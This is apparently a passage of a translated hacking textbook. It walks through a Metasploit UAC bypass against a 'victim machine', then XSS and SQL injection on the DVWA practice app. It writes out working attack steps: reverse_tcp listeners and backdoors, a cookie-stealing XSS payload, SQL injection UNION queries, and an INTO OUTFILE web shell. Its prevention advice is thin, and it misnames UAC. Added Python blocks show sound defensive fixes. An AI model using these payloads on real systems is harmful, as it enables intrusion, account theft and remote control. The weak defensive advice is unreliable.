    From Windows Vista onward, Microsoft introduced a built-in utility called User Access Control (UAC). UAC raises the security of Windows by restricting application software to the privileges of a basic user. Thus only software the user trusts receives administrative privileges; other software does not. However, even under an administrator account, applications are still restricted just as they are under ordinary accounts.

    Every operating system with User Access Control built in is affected and can be exploited.

    2. Attack steps

    Open a Terminal, type msfconsole and press Enter:

    use exploit/multi/handler. This module exposes much of the functionality of Metasploit's payload system for our exploitation, for example by running: run post/windows/escalate/bypassuac, as in this case, and many other things besides.

    set PAYLOAD windows/meterpreter/reverse_tcp: makes the target connect back to the attacking machine so it can be controlled easily.

    set LHOST 192.168.1.202: the listening host, i.e. the IP address of the attacking machine.

    set LPORT 6789: the listening port; any port will do as long as it is not already in use.

    exploit: starts the listening server.

    We now create a backdoor that connects to the server we started earlier.

    Once it has been created, copy the file backdoor.exe to the victim machine and run it. Samba can be used to share files between Windows and Linux.

    On the Windows machine, share the file with full access:

    Back on the victim machine, run the backdoor.exe that was just copied. At that point, on the victim machine we receive the following:

    We now have a session, but not yet one with full control. To get that, run: run post/windows/escalate/bypassuac

    All supported commands can be listed with: help

    3. Prevention

    Unfortunately, at the time of writing Microsoft has neither acknowledged the flaw in UAC nor released a patch for this vulnerability. A Microsoft spokesperson maintained that there is no vulnerability in UAC at all. We should therefore install reputable antivirus and anti-backdoor software to avoid being exploited.

    Chapter 7: WEB HACKING WITH DVWA

    I. Introduction

    For those of us who have only just started studying hacking, a practice environment is very important, but finding a realistic environment that matches our level is not simple.

    Conversely, those who already have hacking skill and experience surely also want to test how far their skill goes and to improve it further.

    DVWA (Damn Vulnerable Web Application) meets the needs of both newcomers and people with a certain level of skill. DVWA is a framework with security holes built in, following the OWASP Top 10 web security weaknesses. Its levels, from low to high, can satisfy the hacking needs of a great many people.

    In short, DVWA is a deliberately vulnerable PHP/MySQL web application. Its main goal is to help security professionals test their skills and tools in a legal environment, help web developers better understand the process of securing web applications, and help teachers and students teach and learn web application security in a classroom setting.

    II. Installing DVWA on Backtrack

    Because this is a PHP-based framework, the simplest route is to set up a web server with XAMPP first and then copy DVWA into it; we then use DVWA through its web interface.

    1. Download and install XAMPP

    XAMPP is open-source software, so go to the XAMPP home page at http://www.apachefriends.org/en/xampp.html and download the latest version.

    After downloading XAMPP, open a Terminal and type the command shown in the image below

    Start XAMPP

    Finally, open a web browser and go to http://localhost; the main XAMPP page appears as shown below:

    2. Download and install DVWA

    Go to http://www.dvwa.co.uk/ and download DVWA.

    Then extract the downloaded archive and place it in the directory /opt/lampp/htdocs/

    Open a web browser and go to http://localhost/dvwa/; the main DVWA page appears as follows:

    Note: XAMPP must be running before DVWA can be used.

    At the DVWA login page, log in with the default account/password of admin/password.

    Preparation before attacking:

    Open a web browser and go to: localhost/dvwa. ip_address/dvwa can also be used.

    To exploit the flaws in DVWA (XSS, SQL Injection), the Security Level must be set to Low. At that level, any code we add is kept exactly as entered. At High, the function htmlspecialchars() is used to convert special characters, so the output no longer matches the original input. At Medium, the string is stripped out so it has no effect; other HTML tags, however, still take effect as normal.

    Therefore we set the Security Level to low: choose DVWA Security -> Low -> Submit

    III. Attack techniques on DVWA

    1. XSS (Cross-Site Scripting)

    a) Introduction

    Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script code that can harm other users. The injected malicious code is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and may also consist of HTML tags.

    XSS is one of the most common flaws; a great many websites suffer from it, which is why more and more people are paying attention to it!

    b) Types of XSS

    XSS can be classified as follows:

    Stored XSS Attacks

    Stored XSS is a form of attack in which the attacker injects a dangerous script (usually JavaScript) into our website through some feature (e.g. comments, a guestbook, posting articles, ...), so that when other members visit the website they are hit by the malicious code the attacker left behind. Because this malicious code is usually saved in the website's database, it is called Stored. Stored XSS arises because we do not properly filter the data that members submit, allowing malicious code to be saved in the website's database.

    Reflected XSS Attacks

    In this form, the attacker usually appends malicious code to a URL of our website and sends it to the victim; if the victim opens the URL, they are hit by the malicious code. This happens because we do not filter the input that arrives through our website's URLs.

    XSS Attack Consequences

    This method is similar to the two above. The difference, however, lies in how the payload is delivered to the server. Even a read-only or brochureware site can be affected by XSS. XSS can cause damage ranging from minor to severe, such as taking over user accounts. An XSS attack can obtain the session cookie, resulting in the loss of the user's account. It can also affect end-user data by installing a Trojan, redirecting the visitor to another page, or changing the content of a page.

    c) How XSS works

    Basically, the operation of XSS can be described as follows:

    Description of how XSS works

    Following the principle above, a hacker can exploit security holes in a website. Any HTML tag can serve as a tool for an XSS attack; among them, the IMG and IFRAME tags can make the browser load further websites when the HTML is rendered. Exploiting this principle, hackers can inject malicious code and subject the victim machine to an XSS attack.

    d) The harm of XSS

    XSS is usually used for the following purposes:

    - Stealing information
    - Helping the hacker gain access to sensitive information
    - Gaining free access to content that should only be available for a fee
    - Spying on the browsing interests of network users
    - Changing the appearance of (defacing) a web page
    - Denial-of-service (DoS) attacks

    Malicious JavaScript can access any of the following:

    - Persistent cookies (of the XSS-vulnerable site) maintained by the browser.
    - RAM (in-memory) cookies of the XSS-vulnerable site.
    - The names of all windows opened from the XSS-vulnerable site.
    - Any information accessible from the current DOM (such as values and HTML code).

    e) XSS attack

    Run the script alert('XSS'); to display an alert in the web browser

    The result we get, rather than the input merely being saved in the database:

    View the user's cookie:

    alert(document.cookie);

    We can send this cookie directly to the attacking machine instead of merely displaying it on screen.

    We can also inject iframe tags:

    In addition, we can use the Metasploit Framework (introduced above) to attack and take control, together with a backdoor that makes the target machine connect back. Command to create the backdoor:

    msfpayload php/meterpreter/reverse_tcp lhost=192.168.10.102 lport=4444 R > forum.php

    Use msfconsole and set the parameters needed to listen for connections on the server:

    Back in XSS Stored, we use the script:

    Windows.

    After the script above has run, the Metasploit Framework opens a connection to it and we can attack.

    Some screenshots of the attack:

    f) Some prevention and mitigation methods

    Nobody can measure the full extent of the danger XSS poses, but preventing XSS is not especially difficult. There are many ways to address this problem.

    OWASP (The Open Web Application Security Project) states that to build highly secure websites, user-supplied data should be handled as follows:

    - Accept only valid data.
    - Reject bad data.
    - Continuously check and sanitise data.

    Web developers can protect their websites from XSS exploitation by ensuring that dynamically generated pages contain no script tags: filter and validate the input data received from users, and encode and filter the values that are output to users.
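    The three DVWA security levels described earlier in this chapter and the output-encoding advice just given, as an added Python example that is not part of the original document or of DVWA: level_low, level_medium and level_high are my approximations of the behaviour the text describes (not DVWA's own source), the inputs are constructed, and attacker.invalid is a placeholder host.

```python
import html
import re

# Constructed inputs shaped like the payloads the chapter discusses; attacker.invalid is a placeholder.
SCRIPT_INPUT = "<script>alert('XSS');</script>"
IFRAME_INPUT = '<iframe src="http://attacker.invalid/"></iframe>'
PLAIN_INPUT = "Tom & Jerry <3"

def level_low(value: str) -> str:
    """Approximation of DVWA 'Low' as the text describes it: input is reflected unchanged."""
    return value

def level_medium(value: str) -> str:
    """Approximation of DVWA 'Medium': only the literal <script> opener is stripped (a blacklist)."""
    return value.replace("<script>", "")

def level_high(value: str) -> str:
    """Approximation of DVWA 'High': the htmlspecialchars() equivalent, markup characters become entities."""
    return html.escape(value, quote=True)

# Tags the chapter names as XSS vectors; any of them opening in the output means live markup.
_ACTIVE_TAG = re.compile(r"<\s*(script|iframe|img)\b", re.IGNORECASE)

def reaches_browser_as_markup(output: str) -> bool:
    """True when the reflected output would still be parsed by the browser as an active tag."""
    return _ACTIVE_TAG.search(output) is not None

def check_all() -> dict:
    """For each level, whether the script payload and the iframe payload survive as live markup."""
    levels = (("low", level_low), ("medium", level_medium), ("high", level_high))
    return {name: [reaches_browser_as_markup(fn(p)) for p in (SCRIPT_INPUT, IFRAME_INPUT)]
            for name, fn in levels}

if __name__ == "__main__":
    for level, (script_ok, iframe_ok) in check_all().items():
        print(f"{level:>6}: script survives={script_ok}  iframe survives={iframe_ok}")
    # Encoding keeps ordinary text readable while neutralising the markup characters.
    print(level_high(PLAIN_INPUT))  # Tom &amp; Jerry &lt;3
```

    Only the encoding level neutralises both payloads; the Medium blacklist stops the script tag but, as the text notes, leaves other HTML tags intact.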

    2. SQL Injection

    a) What is SQL Injection?

    SQL Injection is one of the web hacking techniques that is becoming increasingly common today. By injecting SQL queries or commands into input before it is passed to the web application for processing, we can log in without a username and password, execute code remotely, dump data, and obtain root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Firefox, Google Chrome, ...

    b) Steps to exploit the website's flaw

    Go to http://localhost/dvwa/ and choose SQL Injection (Blind):

    We begin exploiting the flaw from the User ID input field:

    Enter: 1

    If we instead enter 1' or '1'='1 or 1' or ''='#, we get a very surprising result

    The # is used to neutralise the final quote character (') in the SQL query:

    SELECT first_name, last_name FROM users WHERE user_id = '$user_id'

    View the database name: a' UNION select 1, database();#

    View the user and system user: a' UNION select system_user(), user();#

    Determine the user name the application is using and the MySQL version

    View all database names together with the tables in the MySQL server:

    a' UNION select table_schema, table_name from information_schema.tables;#

    We can add a WHERE clause to narrow the result:

    a' UNION select table_schema, table_name from information_schema.tables where table_schema='dvwa';#

    List the columns in the table:

    a' UNION select table_name, column_name from information_schema.columns where table_schema='dvwa';#

    Next, run the following statement:

    ' union select '','' into outfile 'C:\\xampp\\htdocs\\sqlinjection.php' ;#

    Once it has been created, we just need to run commands from the browser by appending ?cmd=command to the URL. For example, 192.168.10.20/sqlinjection.php?cmd=dir gives us:

    Now we have full control of the victim's computer.

    c) Measures against SQL Injection

    - Change the default password of the root user
    - Delete all default stored procedures on the server
    - Filter potentially harmful characters such as ', ", ;, :, # as soon as a query request arrives from outside
    - Keep the SQL server updated with the latest patches
    - Block sensitive SQL keywords with a firewall right at the input
    - Encrypt passwords
    - Remove the keywords SELECT, DELETE, INSERT, ... from queries coming from outside.
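    The vulnerable user_id query from the exploitation steps above, beside the parameterised and validated forms that the prevention list is really asking for, as an added Python example that is not part of the original document or of DVWA: an in-memory SQLite table with constructed rows stands in for DVWA's MySQL users table, so the MySQL-only # comment trick is not exercised here.

```python
import sqlite3

# Constructed rows standing in for DVWA's users table (not DVWA's real data).
USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]

def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the MySQL table the chapter queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn

def lookup_concatenated(conn: sqlite3.Connection, user_id: str) -> list:
    """The vulnerable pattern from the chapter: the raw value is pasted into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """The fix: the driver binds the value, so quotes and operators inside it stay data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

def lookup_validated(conn: sqlite3.Connection, user_id: str) -> list:
    """Defence in depth: reject anything that is not a positive integer before querying at all."""
    if not user_id.isdigit():
        raise ValueError("user_id must be a positive integer")
    return lookup_parameterized(conn, user_id)

if __name__ == "__main__":
    db = make_db()
    print(lookup_concatenated(db, "1"))              # one row, as intended
    print(lookup_concatenated(db, "1' or '1'='1"))  # every row: the WHERE clause is always true
    print(lookup_parameterized(db, "1' or '1'='1")) # no rows: the whole string is one compared value
```

    Character filtering, as in the list above, is a weaker substitute: binding parameters removes the quote's ability to change the query at all, and validating the type rejects the request before the database is ever reached.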
